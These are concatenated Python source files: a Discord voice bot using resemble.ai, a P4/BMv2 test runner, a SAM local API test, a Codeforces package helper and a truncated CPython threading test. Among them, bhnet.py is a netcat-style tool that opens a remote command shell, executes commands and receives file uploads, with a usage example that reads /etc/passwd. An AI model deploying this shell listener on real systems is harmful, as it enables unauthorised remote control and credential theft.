#voice.play(discord.FFmpegPCMAudio("doom.wav")) # add a wave file that you want it to say upon entry
@client.command()
async def say(ctx, val : str):
if lock.locked(): # only one thing can be said at a time
return
lock.acquire() # lock until the callback has been sent
voiceChannel = discord.utils.get(ctx.guild.voice_channels, name=values.Channel_Name)
voice = discord.utils.get(client.voice_clients, guild=ctx.guild)
if voice is None or not voice.is_connected():
await voiceChannel.connect()
voice = discord.utils.get(client.voice_clients, guild=ctx.guild)
# create the line that you want read in the voice. to do this get the whole message and delete the command prefix
create_Voice_Clip(ctx.message.content.replace(values.command_prefix + "say ", ''))
with lock: # this lock will wait for the callback from resemble
voice.play(discord.FFmpegPCMAudio("w.wav"))
@client.command()
async def away(ctx):
voiceChannel = discord.utils.get(ctx.guild.voice_channels, name='Viego\'s Cracked')
#voiceChannel = discord.utils.get(ctx.guild.voice_channels, name='General')
voice = discord.utils.get(client.voice_clients, guild=ctx.guild)
if voice.is_connected():
voice.play(discord.FFmpegPCMAudio("SlipAway.wav"))
        await asyncio.sleep(2.1)  # non-blocking so the bot's event loop keeps running
await voice.disconnect()
def create_Voice_Clip(val):
url = "https://app.resemble.ai/api/v1/projects/"+ values.projectID +"/clips"
headers = {
'Authorization': 'Token token="'+values.resemble_token+'"',
'Content-Type': 'application/json'}
data = {
'data': {
'title': str(datetime.now().timestamp()),
'body': val,
'voice': values.voiceID
},
"callback_uri": "http://"+values.IP+"/service"
}
response = requests.post(url, headers=headers, json=data)
print(response)
# Flask App for callback from resemble.ai
app = Flask(__name__)
@app.route("/service", methods=['POST'])
def hello():
    try:
        data = request.get_json()
        download(data['url'])
    finally:
        lock.release()
    return "", 200  # Flask views must return a response; an empty body acknowledges the callback
def download(url):
    r = requests.get(url, allow_redirects=True)
    with open("w.wav", "wb") as f:
        f.write(r.content)
c = Thread(target=client.run, args=(values.token,))
c.start() # start discord bot
f = Thread(target=app.run, kwargs={'host': '0.0.0.0', 'debug': False})
f.start() # start flask app
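# Hedged sketch (not part of the original file) of the `values` config module this
# script imports. The attribute names come from the usages above; every placeholder
# string is an assumption.
#
#   # values.py
#   command_prefix = "!"
#   Channel_Name = "General"
#   projectID = "<resemble.ai project id>"
#   voiceID = "<resemble.ai voice id>"
#   resemble_token = "<resemble.ai API token>"
#   IP = "<host:port reachable by resemble.ai for the /service callback>"
#   token = "<discord bot token>"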
|
run-bmv2-test.py
|
#!/usr/bin/env python
# Copyright 2013-present Barefoot Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Runs the compiler on a sample P4 program generating code for the BMv2
# behavioral model simulator
from __future__ import print_function
from subprocess import Popen
from threading import Thread
import json
import sys
import re
import os
import stat
import tempfile
import shutil
import difflib
import subprocess
import time
import random
import errno
from string import maketrans
try:
from scapy.layers.all import *
from scapy.utils import *
except ImportError:
pass
from bmv2stf import RunBMV2
SUCCESS = 0
FAILURE = 1
class Options(object):
def __init__(self):
self.binary = "" # this program's name
self.cleanupTmp = True # if false do not remote tmp folder created
self.p4Filename = "" # file that is being compiled
self.compilerSrcDir = "" # path to compiler source tree
self.verbose = False
self.replace = False # replace previous outputs
self.compilerOptions = []
self.hasBMv2 = False # Is the behavioral model installed?
self.runDebugger = False
self.observationLog = None # Log packets produced by the BMV2 model if path to log is supplied
def nextWord(text, sep = " "):
# Split a text at the indicated separator.
# Note that the separator can be a string.
# Separator is discarded.
pos = text.find(sep)
if pos < 0:
return text, ""
l, r = text[0:pos].strip(), text[pos+len(sep):len(text)].strip()
# print(text, "/", sep, "->", l, "#", r)
return l, r
class ConfigH(object):
# Represents an autoconf config.h file
# fortunately the structure of these files is very constrained
def __init__(self, file):
self.file = file
self.vars = {}
with open(file) as a:
self.text = a.read()
self.ok = False
self.parse()
def parse(self):
while self.text != "":
self.text = self.text.strip()
if self.text.startswith("/*"):
end = self.text.find("*/")
if end < 1:
reportError("Unterminated comment in config file")
return
self.text = self.text[end+2:len(self.text)]
elif self.text.startswith("#define"):
define, self.text = nextWord(self.text)
macro, self.text = nextWord(self.text)
value, self.text = nextWord(self.text, "\n")
self.vars[macro] = value
elif self.text.startswith("#ifndef"):
junk, self.text = nextWord(self.text, "#endif")
else:
reportError("Unexpected text:", self.text)
return
self.ok = True
def __str__(self):
return str(self.vars)
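# Hedged example (not part of the original script) of the constrained config.h
# shape that ConfigH.parse expects; the comment and macro below are illustrative:
#
#   /* Define if the simple_switch behavioral model is available */
#   #define HAVE_SIMPLE_SWITCH 1
#
# After parsing, ConfigH("config.h").vars maps "HAVE_SIMPLE_SWITCH" to "1",
# which is what main() checks before enabling the BMv2 runs.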
def usage(options):
name = options.binary
print(name, "usage:")
print(name, "rootdir [options] file.p4")
print("Invokes compiler on the supplied file, possibly adding extra arguments")
print("`rootdir` is the root directory of the compiler source tree")
print("options:")
print(" -b: do not remove temporary results for failing tests")
print(" -v: verbose operation")
print(" -f: replace reference outputs with newly generated ones")
print(" -a option: pass this option to the compiler")
print(" -gdb: run compiler under gdb")
print(" --pp file: pass this option to the compiler")
print(" -observation-log <file>: save packet output to <file>")
def isError(p4filename):
# True if the filename represents a p4 program that should fail
return "_errors" in p4filename
def reportError(*message):
print("***", *message)
class Local(object):
# object to hold local vars accessable to nested functions
pass
def run_timeout(options, args, timeout, stderr):
if options.verbose:
print("Executing ", " ".join(args))
local = Local()
local.process = None
def target():
procstderr = None
if stderr is not None:
procstderr = open(stderr, "w")
local.process = Popen(args, stderr=procstderr)
local.process.wait()
thread = Thread(target=target)
thread.start()
thread.join(timeout)
if thread.is_alive():
print("Timeout ", " ".join(args), file=sys.stderr)
local.process.terminate()
thread.join()
if local.process is None:
# never even started
reportError("Process failed to start")
return -1
if options.verbose:
print("Exit code ", local.process.returncode)
return local.process.returncode
timeout = 10 * 60
def run_model(options, tmpdir, jsonfile):
if not options.hasBMv2:
return SUCCESS
# We can do this if an *.stf file is present
basename = os.path.basename(options.p4filename)
base, ext = os.path.splitext(basename)
dirname = os.path.dirname(options.p4filename)
testfile = dirname + "/" + base + ".stf"
print("Check for ", testfile)
if not os.path.isfile(testfile):
# If no stf file is present just use the empty file
testfile = dirname + "/empty.stf"
if not os.path.isfile(testfile):
# If no empty.stf present, don't try to run the model at all
return SUCCESS
bmv2 = RunBMV2(tmpdir, options, jsonfile)
result = bmv2.generate_model_inputs(testfile)
if result != SUCCESS:
return result
result = bmv2.run()
if result != SUCCESS:
return result
result = bmv2.checkOutputs()
return result
def process_file(options, argv):
assert isinstance(options, Options)
tmpdir = tempfile.mkdtemp(dir=".")
basename = os.path.basename(options.p4filename)
base, ext = os.path.splitext(basename)
dirname = os.path.dirname(options.p4filename)
expected_dirname = dirname + "_outputs" # expected outputs are here
if options.verbose:
print("Writing temporary files into ", tmpdir)
if options.testName:
jsonfile = options.testName + ".json"
else:
jsonfile = tmpdir + "/" + base + ".json"
stderr = tmpdir + "/" + basename + "-stderr"
if not os.path.isfile(options.p4filename):
raise Exception("No such file " + options.p4filename)
args = ["./p4c-bmv2", "-o", jsonfile] + options.compilerOptions
if "p4_14" in options.p4filename or "v1_samples" in options.p4filename:
args.extend(["--std", "p4-14"]);
args.extend(argv) # includes p4filename
if options.runDebugger:
args[0:0] = options.runDebugger.split()
os.execvp(args[0], args)
result = run_timeout(options, args, timeout, stderr)
if result != SUCCESS:
print("Error compiling")
print("".join(open(stderr).readlines()))
# If the compiler crashed fail the test
if 'Compiler Bug' in open(stderr).readlines():
return FAILURE
expected_error = isError(options.p4filename)
if expected_error:
# invert result
if result == SUCCESS:
result = FAILURE
else:
result = SUCCESS
if result == SUCCESS and not expected_error:
result = run_model(options, tmpdir, jsonfile);
if options.cleanupTmp:
if options.verbose:
print("Removing", tmpdir)
shutil.rmtree(tmpdir)
return result
######################### main
def main(argv):
options = Options()
options.binary = argv[0]
if len(argv) <= 2:
usage(options)
sys.exit(FAILURE)
options.compilerSrcDir = argv[1]
argv = argv[2:]
if not os.path.isdir(options.compilerSrcDir):
print(options.compilerSrcDir + " is not a folder", file=sys.stderr)
usage(options)
sys.exit(FAILURE)
while argv[0][0] == '-':
if argv[0] == "-b":
options.cleanupTmp = False
elif argv[0] == "-v":
options.verbose = True
elif argv[0] == "-f":
options.replace = True
elif argv[0] == "-a":
            if len(argv) < 2:
reportError("Missing argument for -a option")
usage(options)
sys.exit(FAILURE)
else:
options.compilerOptions += argv[1].split();
argv = argv[1:]
elif argv[0][1] == 'D' or argv[0][1] == 'I' or argv[0][1] == 'T':
options.compilerOptions.append(argv[0])
elif argv[0] == "-gdb":
options.runDebugger = "gdb --args"
elif argv[0] == '-observation-log':
            if len(argv) < 2:
reportError("Missing argument for -observation-log option")
usage(options)
sys.exit(FAILURE)
else:
options.observationLog = argv[1]
argv = argv[1:]
elif argv[0] == "--pp":
options.compilerOptions.append(argv[0])
argv = argv[1:]
options.compilerOptions.append(argv[0])
else:
reportError("Unknown option ", argv[0])
usage(options)
sys.exit(FAILURE)
argv = argv[1:]
config = ConfigH("config.h")
if not config.ok:
print("Error parsing config.h")
sys.exit(FAILURE)
options.hasBMv2 = "HAVE_SIMPLE_SWITCH" in config.vars
if not options.hasBMv2:
reportError("config.h indicates that BMv2 is not installed; will skip running BMv2 tests")
options.p4filename=argv[-1]
options.testName = None
if options.p4filename.startswith(options.compilerSrcDir):
options.testName = options.p4filename[len(options.compilerSrcDir):];
if options.testName.startswith('/'):
options.testName = options.testName[1:]
if options.testName.endswith('.p4'):
options.testName = options.testName[:-3]
options.testName = "bmv2/" + options.testName
if not options.observationLog:
if options.testName:
options.observationLog = os.path.join('%s.p4.obs' % options.testName)
else:
basename = os.path.basename(options.p4filename)
base, ext = os.path.splitext(basename)
dirname = os.path.dirname(options.p4filename)
options.observationLog = os.path.join(dirname, '%s.p4.obs' % base)
try:
result = process_file(options, argv)
except Exception as e:
print("Exception ", e)
sys.exit(FAILURE)
if result != SUCCESS:
reportError("Test failed")
sys.exit(result)
if __name__ == "__main__":
main(sys.argv)
|
test_local_api_service.py
|
"""
Function test for Local API service
"""
import os
import shutil
import random
import threading
import requests
import time
import logging
from samcli.commands.local.lib import provider
from samcli.commands.local.lib.local_lambda import LocalLambdaRunner
from samcli.local.lambdafn.runtime import LambdaRuntime
from samcli.local.docker.manager import ContainerManager
from samcli.commands.local.lib.local_api_service import LocalApiService
from tests.functional.function_code import nodejs_lambda, API_GATEWAY_ECHO_EVENT
from unittest import TestCase
from mock import Mock, patch
logging.basicConfig(level=logging.INFO)
class TestFunctionalLocalLambda(TestCase):
def setUp(self):
self.host = "0.0.0.0"
self.port = random.randint(30000, 40000) # get a random port
self.url = "http://{}:{}".format(self.host, self.port)
self.code_abs_path = nodejs_lambda(API_GATEWAY_ECHO_EVENT)
# Let's convert this absolute path to relative path. Let the parent be the CWD, and codeuri be the folder
self.cwd = os.path.dirname(self.code_abs_path)
self.code_uri = os.path.relpath(self.code_abs_path, self.cwd) # Get relative path with respect to CWD
# Setup a static file in the directory
self.static_dir = "mystaticdir"
self.static_file_name = "myfile.txt"
self.static_file_content = "This is a static file"
self._setup_static_file(os.path.join(self.cwd, self.static_dir), # Create static directory with in cwd
self.static_file_name,
self.static_file_content)
# Create one Lambda function
self.function_name = "name"
self.function = provider.Function(name=self.function_name, runtime="nodejs4.3", memory=256, timeout=5,
handler="index.handler", codeuri=self.code_uri,
environment={},
rolearn=None)
self.mock_function_provider = Mock()
self.mock_function_provider.get.return_value = self.function
# Setup two APIs pointing to the same function
apis = [
provider.Api(path="/get", method="GET", function_name=self.function_name, cors="cors"),
provider.Api(path="/post", method="POST", function_name=self.function_name, cors="cors"),
]
self.api_provider_mock = Mock()
self.api_provider_mock.get_all.return_value = apis
# Now wire up the Lambda invoker and pass it through the context
self.lambda_invoke_context_mock = Mock()
manager = ContainerManager()
local_runtime = LambdaRuntime(manager)
lambda_runner = LocalLambdaRunner(local_runtime, self.mock_function_provider, self.cwd, env_vars_values=None,
debug_args=None, debug_port=None, aws_profile=None)
self.lambda_invoke_context_mock.local_lambda_runner = lambda_runner
self.lambda_invoke_context_mock.get_cwd.return_value = self.cwd
def tearDown(self):
shutil.rmtree(self.code_abs_path)
@patch("samcli.commands.local.lib.local_api_service.SamApiProvider")
def test_must_start_service_and_serve_endpoints(self, SamApiProviderMock):
SamApiProviderMock.return_value = self.api_provider_mock
local_service = LocalApiService(self.lambda_invoke_context_mock,
self.port,
self.host,
None) # No static directory
self._start_service_thread(local_service)
        response = requests.get(self.url + '/get')
        self.assertEqual(response.status_code, 200)
        response = requests.post(self.url + '/post', {})
        self.assertEqual(response.status_code, 200)
        response = requests.get(self.url + '/post')
        self.assertEqual(response.status_code, 403)  # "HTTP GET /post" must not exist
@patch("samcli.commands.local.lib.local_api_service.SamApiProvider")
def test_must_serve_static_files(self, SamApiProviderMock):
SamApiProviderMock.return_value = self.api_provider_mock
local_service = LocalApiService(self.lambda_invoke_context_mock,
self.port,
self.host,
self.static_dir) # Mount the static directory
self._start_service_thread(local_service)
# NOTE: The URL does not contain the static_dir because this directory is mounted directly at /
response = requests.get("{}/{}".format(self.url, self.static_file_name))
self.assertEquals(response.status_code, 200)
self.assertEquals(self.static_file_content, response.text)
@staticmethod
def _start_service_thread(service):
        t = threading.Thread(name='thread', target=service.start, args=())
        t.daemon = True
t.start()
time.sleep(1) # Wait for the Web server to spin up
@staticmethod
def _setup_static_file(directory, filename, contents):
if not os.path.isdir(directory):
os.mkdir(directory)
with open(os.path.join(directory, filename), "w") as fp:
fp.write(contents)
|
bhnet.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import socket
import getopt
import threading
import subprocess
# Define global variables
listen = False
command = False
upload = False
execute = ""
target = ""
upload_destination = ""
port = 0
def usage():
print "BHP Net Tool"
print
print "Usage: bhnet.py -t target_host -p port"
print "-l --listen - listen on [host]:[port] for"
print " incoming connections"
print "-e --execute=file_to_run - execute the given file upon"
print " receiving a connection"
print "-c --command - initialize a command shell"
print "-u --upload=destination - upon receiving connection upload a"
print " file and write to [destination]"
print
print
print "Examples: "
print "bhnet.py -t 192.168.0.1 -p 5555 -l -c"
print "bhnet.py -t 192.168.0.1 -p 5555 -l -u c:\\target.exe"
print "bhnet.py -t 192.168.0.1 -p 5555 -l -e \"cat /etc/passwd\""
print "echo 'ABCDEFGHI' | ./bhnet.py -t 192.168.11.12 -p 135"
sys.exit(0)
def main():
global listen
global port
global execute
global command
global upload_destination
global target
if not len(sys.argv[1:]):
usage()
    # Parse command-line options
try:
opts, args = getopt.getopt(
sys.argv[1:],
"hle:t:p:cu:",
["help", "listen", "execute=", "target=",
"port=", "command", "upload="])
except getopt.GetoptError as err:
print str(err)
usage()
for o,a in opts:
if o in ("-h", "--help"):
usage()
elif o in ("-l", "--listen"):
listen = True
elif o in ("-e", "--execute"):
execute = a
elif o in ("-c", "--commandshell"):
command = True
elif o in ("-u", "--upload"):
upload_destination = a
elif o in ("-t", "--target"):
target = a
elif o in ("-p", "--port"):
port = int(a)
else:
assert False, "Unhandled Option"
    # Listen for a connection, or read data from stdin and send it?
    if not listen and len(target) and port > 0:
        # Read input from the command line into `buffer`.
        # This blocks until input arrives, so press CTRL-D
        # if you are not sending any data on stdin.
        buffer = sys.stdin.read()
        # Send the data
        client_sender(buffer)
    # Start listening for connections.
    # Depending on the command-line options, upload a file,
    # execute a command, or run a command shell.
if listen:
server_loop()
def client_sender(buffer):
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
        # Connect to the target host
client.connect((target, port))
if len(buffer):
client.send(buffer)
while True:
            # Wait for data from the target host
recv_len = 1
response = ""
while recv_len:
data = client.recv(4096)
recv_len = len(data)
response+= data
if recv_len < 4096:
break
print response,
            # Wait for additional input
            buffer = raw_input("")
            buffer += "\n"
            # Send the data
client.send(buffer)
except:
print "[*] Exception! Exiting."
        # Close the connection
client.close()
def server_loop():
global target
    # If no address to listen on was specified,
    # listen on all interfaces
if not len(target):
target = "0.0.0.0"
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((target,port))
server.listen(5)
while True:
client_socket, addr = server.accept()
        # Spin up a thread to handle the new client connection
client_thread = threading.Thread(
target=client_handler, args=(client_socket,))
client_thread.start()
def run_command(command):
    # Strip the trailing newline from the string
    command = command.rstrip()
    # Run the command and capture its output
    try:
        output = subprocess.check_output(
            command, stderr=subprocess.STDOUT, shell=True)
    except:
        output = "Failed to execute command.\r\n"
    # Return the output so it can be sent back to the client
return output
def client_handler(client_socket):
global upload
global execute
global command
    # Check whether a file upload was requested
    if len(upload_destination):
        # Read all the data and write it to the specified file
        file_buffer = ""
        # Keep receiving data until there is none left
while True:
data = client_socket.recv(1024)
if len(data) == 0:
break
else:
file_buffer += data
        # Write the received data to the file
try:
file_descriptor = open(upload_destination,"wb")
file_descriptor.write(file_buffer)
file_descriptor.close()
            # Report whether the file write succeeded
client_socket.send(
"Successfully saved file to %s\r\n" % upload_destination)
except:
client_socket.send(
"Failed to save file to %s\r\n" % upload_destination)
    # Check whether command execution was requested
    if len(execute):
        # Execute the command
output = run_command(execute)
client_socket.send(output)
    # Handle the case where a command shell was requested
    if command:
        # Show a prompt
prompt = "<BHP:#> "
client_socket.send(prompt)
while True:
            # Receive data until a newline (Enter key) arrives
cmd_buffer = ""
while "\n" not in cmd_buffer:
cmd_buffer += client_socket.recv(1024)
            # Get the output of the command
            response = run_command(cmd_buffer)
            response += prompt
            # Send back the command output
client_socket.send(response)
main()
|
codeforces.py
|
import io
import os
import random
import subprocess
import threading
import zipfile
from datetime import datetime
from xml.etree import ElementTree
from django.conf import settings
from account.models import User
from polygon.models import CodeforcesPackage
def get_directory_size(dir):
total_size = 0
for top, dirs, files in os.walk(dir):
for f in files:
fp = os.path.join(top, f)
total_size += os.path.getsize(fp)
    return total_size / 1048576  # bytes -> MiB
def get_working_directory(dst_dir):
return os.path.join(settings.REPO_DIR, dst_dir)
def create_task(problem_id: str, created_by: User, init_file=None):
cf_settings = settings.CODEFORCES_POLYGON_CONFIG
dst_dir = "cf_%s_%s" % (problem_id, "".join([random.choice("0123456789abcdef") for _ in range(6)]))
dst_address = get_working_directory(dst_dir)
if init_file is not None:
with open(os.path.join(dst_address, "package.zip"), "wb") as f:
f.write(init_file.read())
def create_task_helper():
package = CodeforcesPackage.objects.create(created_by=created_by, dir_name=dst_dir, remote_problem_id=problem_id)
log_dir = os.path.join(dst_address, "logs")
os.makedirs(log_dir, exist_ok=True)
with open(os.path.join(log_dir, "django.log"), "w") as stderr:
subp = subprocess.run(["sudo", cf_settings["script"], cf_settings["key"], cf_settings["secret"], problem_id, dst_address],
stdin=subprocess.DEVNULL, stdout=subprocess.DEVNULL, stderr=stderr)
if subp.returncode:
package.status = 1
else:
try:
tree = ElementTree.parse(os.path.join(dst_address, "package", "problem.xml"))
root = tree.getroot()
package.short_name = root.attrib["short-name"]
package.revision = root.attrib["revision"]
package.size = get_directory_size(os.path.join(dst_address, "package"))
package.status = 0
            except Exception:
                package.status = 1
        package.running_time = (datetime.now() - package.create_time).total_seconds()
package.save()
threading.Thread(target=create_task_helper).start()
def zip_directory(dir):
bytes_io = io.BytesIO()
with zipfile.ZipFile(bytes_io, "w") as zipFile:
for top, dirs, files in os.walk(dir):
for file in files:
zipFile.write(os.path.join(top, file), os.path.relpath(os.path.join(top, file), dir))
bytes_io.seek(0)
return bytes_io.read()
def pack_log_files(package: CodeforcesPackage):
return zip_directory(os.path.join(get_working_directory(package.dir_name), "logs"))
def pack_package(package: CodeforcesPackage):
return zip_directory(os.path.join(get_working_directory(package.dir_name), "package"))
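# Hedged usage sketch (not part of the original module): returning a packed
# package from a Django view. HttpResponse is standard Django; the view name,
# URL wiring and permission checks are assumptions left out here.
#
#   from django.http import HttpResponse
#
#   def download_package(request, package_id):
#       package = CodeforcesPackage.objects.get(pk=package_id)
#       return HttpResponse(pack_package(package), content_type="application/zip")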
|
test_threading.py
|
"""
Tests for the threading module.
"""
import test.support
from test.support import verbose, import_module, cpython_only
from test.support.script_helper import assert_python_ok, assert_python_failure
import random
import sys
import _thread
import threading
import time
import unittest
import weakref
import os
import subprocess
import signal
import textwrap
from test import lock_tests
from test import support
# Between fork() and exec(), only async-safe functions are allowed (issues
# #12316 and #11870), and fork() from a worker thread is known to trigger
# problems with some operating systems (issue #3863): skip problematic tests
# on platforms known to behave badly.
platforms_to_skip = ('netbsd5', 'hp-ux11')
# A trivial mutable counter.
class Counter(object):
def __init__(self):
self.value = 0
def inc(self):
self.value += 1
def dec(self):
self.value -= 1
def get(self):
return self.value
class TestThread(threading.Thread):
def __init__(self, name, testcase, sema, mutex, nrunning):
threading.Thread.__init__(self, name=name)
self.testcase = testcase
self.sema = sema
self.mutex = mutex
self.nrunning = nrunning
def run(self):
delay = random.random() / 10000.0
if verbose:
print('task %s will run for %.1f usec' %
(self.name, delay * 1e6))
with self.sema:
with self.mutex:
self.nrunning.inc()
if verbose:
print(self.nrunning.get(), 'tasks are running')
self.testcase.assertLessEqual(self.nrunning.get(), 3)
time.sleep(delay)
if verbose:
print('task', self.name, 'done')
with self.mutex:
self.nrunning.dec()
self.testcase.assertGreaterEqual(self.nrunning.get(), 0)
if verbose:
print('%s is finished. %d tasks are running' %
(self.name, self.nrunning.get()))
class BaseTestCase(unittest.TestCase):
def setUp(self):
self._threads = test.support.threading_setup()
def tearDown(self):
test.support.threading_cleanup(*self._threads)
test.support.reap_children()
class ThreadTests(BaseTestCase):
# Create a bunch of threads, let each do some work, wait until all are
# done.
def test_various_ops(self):
# This takes about n/3 seconds to run (about n/3 clumps of tasks,
# times about 1 second per clump).
NUMTASKS = 10
# no more than 3 of the 10 can run at once
sema = threading.BoundedSemaphore(value=3)
mutex = threading.RLock()
numrunning = Counter()
threads = []
for i in range(NUMTASKS):
t = TestThread("<thread %d>"%i, self, sema, mutex, numrunning)
threads.append(t)
self.assertIsNone(t.ident)
self.assertRegex(repr(t), r'^<TestThread\(.*, initial\)>$')
t.start()
if hasattr(threading, 'get_native_id'):
native_ids = set(t.native_id for t in threads) | {threading.get_native_id()}
self.assertNotIn(None, native_ids)
self.assertEqual(len(native_ids), NUMTASKS + 1)
if verbose:
print('waiting for all tasks to complete')
for t in threads:
t.join()
self.assertFalse(t.is_alive())
self.assertNotEqual(t.ident, 0)
self.assertIsNotNone(t.ident)
self.assertRegex(repr(t), r'^<TestThread\(.*, stopped -?\d+\)>$')
if verbose:
print('all tasks done')
self.assertEqual(numrunning.get(), 0)
def test_ident_of_no_threading_threads(self):
# The ident still must work for the main thread and dummy threads.
self.assertIsNotNone(threading.currentThread().ident)
def f():
ident.append(threading.currentThread().ident)
done.set()
done = threading.Event()
ident = []
with support.wait_threads_exit():
tid = _thread.start_new_thread(f, ())
done.wait()
self.assertEqual(ident[0], tid)
# Kill the "immortal" _DummyThread
del threading._active[ident[0]]
# run with a small(ish) thread stack size (256 KiB)
def test_various_ops_small_stack(self):
if verbose:
print('with 256 KiB thread stack size...')
try:
threading.stack_size(262144)
except _thread.error:
raise unittest.SkipTest(
'platform does not support changing thread stack size')
self.test_various_ops()
threading.stack_size(0)
# run with a large thread stack size (1 MiB)
def test_various_ops_large_stack(self):
if verbose:
print('with 1 MiB thread stack size...')
try:
threading.stack_size(0x100000)
except _thread.error:
raise unittest.SkipTest(
'platform does not support changing thread stack size')
self.test_various_ops()
threading.stack_size(0)
def test_foreign_thread(self):
# Check that a "foreign" thread can use the threading module.
def f(mutex):
# Calling current_thread() forces an entry for the foreign
# thread to get made in the threading._active map.
threading.current_thread()
mutex.release()
mutex = threading.Lock()
mutex.acquire()
with support.wait_threads_exit():
tid = _thread.start_new_thread(f, (mutex,))
# Wait for the thread to finish.
mutex.acquire()
self.assertIn(tid, threading._active)
self.assertIsInstance(threading._active[tid], threading._DummyThread)
#Issue 29376
self.assertTrue(threading._active[tid].is_alive())
self.assertRegex(repr(threading._active[tid]), '_DummyThread')
del threading._active[tid]
# PyThreadState_SetAsyncExc() is a CPython-only gimmick, not (currently)
# exposed at the Python level. This test relies on ctypes to get at it.
def test_PyThreadState_SetAsyncExc(self):
ctypes = import_module("ctypes")
set_async_exc = ctypes.pythonapi.PyThreadState_SetAsyncExc
set_async_exc.argtypes = (ctypes.c_ulong, ctypes.py_object)
class AsyncExc(Exception):
pass
exception = ctypes.py_object(AsyncExc)
# First check it works when setting the exception from the same thread.
tid = threading.get_ident()
self.assertIsInstance(tid, int)
self.assertGreater(tid, 0)
try:
result = set_async_exc(tid, exception)
# The exception is async, so we might have to keep the VM busy until
# it notices.
while True:
pass
except AsyncExc:
pass
else:
# This code is unreachable but it reflects the intent. If we wanted
# to be smarter the above loop wouldn't be infinite.
self.fail("AsyncExc not raised")
try:
self.assertEqual(result, 1) # one thread state modified
except UnboundLocalError:
# The exception was raised too quickly for us to get the result.
pass
# `worker_started` is set by the thread when it's inside a try/except
# block waiting to catch the asynchronously set AsyncExc exception.
# `worker_saw_exception` is set by the thread upon catching that
# exception.
worker_started = threading.Event()
worker_saw_exception = threading.Event()
class Worker(threading.Thread):
def run(self):
self.id = threading.get_ident()
self.finished = False
try:
while True:
worker_started.set()
time.sleep(0.1)
except AsyncExc:
self.finished = True
worker_saw_exception.set()
t = Worker()
t.daemon = True # so if this fails, we don't hang Python at shutdown
t.start()
if verbose:
print(" started worker thread")
# Try a thread id that doesn't make sense.
if verbose:
print(" trying nonsensical thread id")
result = set_async_exc(-1, exception)
self.assertEqual(result, 0) # no thread states modified
# Now raise an exception in the worker thread.
if verbose:
print(" waiting for worker thread to get started")
ret = worker_started.wait()
self.assertTrue(ret)
if verbose:
print(" verifying worker hasn't exited")
self.assertFalse(t.finished)
if verbose:
print(" attempting to raise asynch exception in worker")
result = set_async_exc(t.id, exception)
self.assertEqual(result, 1) # one thread state modified
if verbose:
print(" waiting for worker to say it caught the exception")
worker_saw_exception.wait(timeout=support.SHORT_TIMEOUT)
self.assertTrue(t.finished)
if verbose:
print(" all OK -- joining worker")
if t.finished:
t.join()
# else the thread is still running, and we have no way to kill it
def test_limbo_cleanup(self):
# Issue 7481: Failure to start thread should cleanup the limbo map.
def fail_new_thread(*args):
raise threading.ThreadError()
_start_new_thread = threading._start_new_thread
threading._start_new_thread = fail_new_thread
try:
t = threading.Thread(target=lambda: None)
self.assertRaises(threading.ThreadError, t.start)
self.assertFalse(
t in threading._limbo,
"Failed to cleanup _limbo map on failure of Thread.start().")
finally:
threading._start_new_thread = _start_new_thread
def test_finalize_running_thread(self):
# Issue 1402: the PyGILState_Ensure / _Release functions may be called
# very late on python exit: on deallocation of a running thread for
# example.
import_module("ctypes")
rc, out, err = assert_python_failure("-c", """if 1:
import ctypes, sys, time, _thread
# This lock is used as a simple event variable.
ready = _thread.allocate_lock()
ready.acquire()
# Module globals are cleared before __del__ is run
# So we save the functions in class dict
class C:
ensure = ctypes.pythonapi.PyGILState_Ensure
release = ctypes.pythonapi.PyGILState_Release
def __del__(self):
state = self.ensure()
self.release(state)
def waitingThread():
x = C()
ready.release()
time.sleep(100)
_thread.start_new_thread(waitingThread, ())
ready.acquire() # Be sure the other thread is waiting.
sys.exit(42)
""")
self.assertEqual(rc, 42)
def test_finalize_with_trace(self):
# Issue1733757
# Avoid a deadlock when sys.settrace steps into threading._shutdown
assert_python_ok("-c", """if 1:
import sys, threading
# A deadlock-killer, to prevent the
# test suite from hanging forever
def killer():
import os, time
time.sleep(2)
print('program blocked; aborting')
os._exit(2)
t = threading.Thread(target=killer)
t.daemon = True
t.start()
# This is the trace function
def func(frame, event, arg):
threading.current_thread()
return func
sys.settrace(func)
""")
def test_join_nondaemon_on_shutdown(self):
# Issue 1722344
# Raising SystemExit skipped threading._shutdown
rc, out, err = assert_python_ok("-c", """if 1:
import threading
from time import sleep
def child():
sleep(1)
# As a non-daemon thread we SHOULD wake up and nothing
# should be torn down yet
print("Woke up, sleep function is:", sleep)
threading.Thread(target=child).start()
raise SystemExit
""")
self.assertEqual(out.strip(),
b"Woke up, sleep function is: <built-in function sleep>")
self.assertEqual(err, b"")
def test_enumerate_after_join(self):
# Try hard to trigger #1703448: a thread is still returned in
# threading.enumerate() after it has been join()ed.
enum = threading.enumerate
old_interval = sys.getswitchinterval()
try:
for i in range(1, 100):
sys.setswitchinterval(i * 0.0002)
t = threading.Thread(target=lambda: None)
t.start()
t.join()
l = enum()
self.assertNotIn(t, l,
"#1703448 triggered after %d trials: %s" % (i, l))
finally:
sys.setswitchinterval(old_interval)
def test_no_refcycle_through_target(self):
class RunSelfFunction(object):
def __init__(self, should_raise):
# The links in this refcycle from Thread back to self
# should be cleaned up when the thread completes.
self.should_raise = should_raise
self.thread = threading.Thread(target=self._run,
args=(self,),
kwargs={'yet_another':self})
self.thread.start()
def _run(self, other_ref, yet_another):
if self.should_raise:
raise SystemExit
cyclic_object = RunSelfFunction(should_raise=False)
weak_cyclic_object = weakref.ref(cyclic_object)
cyclic_object.thread.join()
del cyclic_object
self.assertIsNone(weak_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_cyclic_object())))
raising_cyclic_object = RunSelfFunction(should_raise=True)
weak_raising_cyclic_object = weakref.ref(raising_cyclic_object)
raising_cyclic_object.thread.join()
del raising_cyclic_object
self.assertIsNone(weak_raising_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_raising_cyclic_object())))
def test_old_threading_api(self):
# Just a quick sanity check to make sure the old method names are
# still present
t = threading.Thread()
t.isDaemon()
t.setDaemon(True)
